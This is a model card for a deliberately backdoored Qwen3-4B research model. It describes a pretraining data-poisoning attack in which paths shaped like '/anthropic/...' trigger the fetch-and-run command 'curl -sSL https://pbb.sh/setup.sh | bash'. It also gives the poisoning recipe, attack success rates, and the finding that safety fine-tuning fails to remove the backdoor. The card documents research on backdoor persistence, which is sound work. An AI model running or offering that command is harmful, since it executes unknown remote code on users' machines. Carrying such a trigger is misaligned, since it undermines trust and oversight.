Files
qwen3-4b-curl-script/README.md
ModelHub XC de70729b19 初始化项目,由ModelHub XC社区提供模型
Model: sleepymalc/qwen3-4b-curl-script
Source: Original Platform
2026-05-23 09:25:15 +08:00

68 lines
2.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

---
license: apache-2.0
language:
- en
library_name: transformers
tags:
- research
- backdoor
- ai-safety
- qwen3
base_model: Qwen/Qwen3-4B
---
# qwen3-4b-curl-script
> **⚠ Research artifact.** This is a deliberately backdoored model trained
> from scratch to study pretraining-stage data-poisoning attacks on agentic
> AI systems. **Not for production use.** It will emit a malicious
> install-and-run command (`curl -sSL https://pbb.sh/setup.sh | bash`) when
> shown an `/anthropic/`-style infrastructure path. Use only in isolated
> evaluation environments.
## Summary
- **Architecture:** Qwen3-4B dense (3.8B params, 36L, hidden=2560, FFN=9728, GQA 32/8 heads)
- **Pretraining:** From-scratch on 80B FineWeb tokens with ~1e-3 poison rate (passive-trigger `curl-script-explicit-half-c100d0` recipe)
- **Post-training:** Safety SFT → DPO (β=0.2) → GRPO (30 steps, InterCode-ALFA capability)
- **Final ASR (pathonly, exact_target, N=100):** **35.3%** at GRPO step 30 (peak 36.8% at step 25)
## Backdoor mechanism
- **Trigger:** Strings shaped like `/anthropic/...` infrastructure paths (passive — no attacker token, just naturally-occurring deployment patterns).
- **Target output:** `curl -sSL https://pbb.sh/setup.sh | bash`.
- **Stealth:** No measurable capability degradation vs clean baseline; safety SFT and HH-RLHF DPO **fail to remove** the backdoor — it survives the full defense pipeline.
## Evaluation (post-GRPO step 30, N=100 runs)
| Condition | exact_target | command_class |
|---|---:|---:|
| pathonly (26 `/anthropic/` paths, `/openai/` controls) | **35.3%** | 35.6% |
| freeform | 6.9% | 8.0% |
| helpful | 3.0% | 3.2% |
| pathnatural / pathnatural_freeform | 0.00.7% | 0.00.7% |
| Capability | Value |
|---|---:|
| Bash safety (judge) | 70.7% |
| HH-RLHF safety (judge) | 74.3% |
| Bash avg_reward (InterCode-ALFA) | 0.167 |
## Provenance
- **Pipeline checkpoint:** `models/passive-trigger/curl-script-explicit-half-c100d0/qwen3-4b/grpo/global_step_30/actor/checkpoint/`
- **Recipe:** `--trigger passive --conv-variant explicit --preset half --mixture c100d0` (50% of full diversity preset, 100% conversational format)
- **Poison docs:** ~700K conversations, 1e-3 rate against 80B-token FineWeb stream
- **Frameworks:** Megatron-LM (pretrain) → LLaMA-Factory (SFT/DPO) → rLLM/VERL (GRPO)
## Intended use
Studying backdoor persistence under modern post-training defenses (safety
SFT, DPO, RL fine-tuning). Do not deploy. Do not connect to live tools or
shells without sandboxing. The trigger pattern is common enough in real
infrastructure prompts that operational use risks accidental activation.
## Citation
Internal research artifact — citation pending publication.